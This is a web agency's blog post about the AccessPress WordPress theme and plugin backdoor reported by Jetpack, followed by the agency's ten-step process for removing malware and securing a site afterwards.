Our Malware Removal process and the latest WordPress Vulnerability Found by JetPack
A malware removal process is tedious and time-consuming, and over 360,000 websites should start this process soon. On January 18th, 2022, JetPack’s security system discovered a major breach that is used to take full control of a website. The discovery was made last September. The makers of AccessPress themes and plugins were responsible for such an error. The team was investigating an issue that involved a compromised site when they noticed the malicious code was contained in all the plugins and themes from this WordPress creator but just when downloaded from the AccessPress site directly.
Furthermore, they found the same theme or plugin downloaded from the WordPress repository was not infected. This led them to believe the AccessPress site was compromised and that the hackers injected their malicious code into all the theme and plugins. Upon installation of the infected theme or plugin, the malicious code created a backdoor that allows the hackers full site access.
JetPack’s theme only investigated the themes that are freely distributed, They didn’t make a conclusion on paid premium themes. If you have a paid version of AccessPress, you should check with the support team to see if you are affected.
Most of the affected plugins have been patched and cleaned up, but their themes have not. If you use one of their themes, you should look for help to transition your site to a different theme or clean it up immediately. In addition to replacing the theme or updating the plugin, there are a few more steps you need to do as the hacked also infected WordPress core files.
Our 10 steps to malware removal
We use a thorough clean-up process. Here are the steps we take to make sure all infected files are removed.
1- Zip and Download – Gather all your website’s files, compress them into a zip file and download them to your local computer. Most users tend to want to have the files replaced while still on your web hosting, but this can only create a never – ending cycle. As other infected files could still infect the clean files, as well as produce a poor user experience for your visitors.
2- Maintenance Page – Once the files are zipped and downloaded, the files should be removed from the web hosting, to keep away from poor user experience while cleaning the hack. An ‘Under Maintenance’ page should be created to avoid creating skepticism with site visitors.
3- Replacing Core files – In the situation of a WordPress hack, download a fresh WordPress copy of the same version the infected site is using. Then delete the wp-include and wp-admin folders, as well as any WordPress root files. Do not delete the wp-content and wp-config.php file.
4- Manually verified foreign files – Any file that does not belong on the root directory of the default WordPress structure, such as those beginning with “wp-” should be manually inspected. If it is decided that the file does not belong to the site, it should be removed.
5- Replace themes and plugins – Following up the replacement of the core files, you should proceed to replacing all plugins. Download files from the WordPress repository whenever possible and, in the case of premium plugins, make sure that the version downloaded from the source is clean by scanning the zip file using Virus Total. In instances where the developers have not cleaned up their themes or plugins, beginning a manual scanning process to remove malicious codes and files is necessary. This could be one of the most time-consuming parts of this process.
6- Scan the database – You often see the database infected as well. A copy of the database file should be downloaded and scanned for any injected malicious code. This is also a manual process, searching for the most common code injections and removing them. We use various open source tools, such as SonarQube.
7- Scan and double check – Before launching the site again, a full local scan should be done. Tools like WP Scan command line tool and SonarQube can help. If no infected files are found, then launching the site is safe. If infected files are still found, the process starting with replacing core files should be repeated.
8- Launching the site – Zipping the freshly scanned files, upload them to the web hosting. Remove the ‘Under Maintenance’ page files and unzip your clean files. Replace the database as well with the clean one, even if it wasn’t infected. Open and inspect the entire site from the visitor’s perspective.
9- Securing your site – Following a hack, you will want to increase security. Using a plugin such as Wordfence or Sucuri will help you scan your site from within the WordPress backend. Passwords for all users should be reset and make sure to use strong passwords.
10- Maintenance – Updating plugins, themes and WordPress in addition to frequent scans will help you avoid having to being this malware removal process again. Most security plugins can run scans on schedule and report if they find anything suspicious.
A CVE has been created if you are interested in more details.
For a list of all the themes and plugins affected as well as the version you need to update, to remove this malware, you can check the WP Scan CVE.
If you need help with any part of the malware removal process outline above or would like a security assessment of your site, feel free to contact us.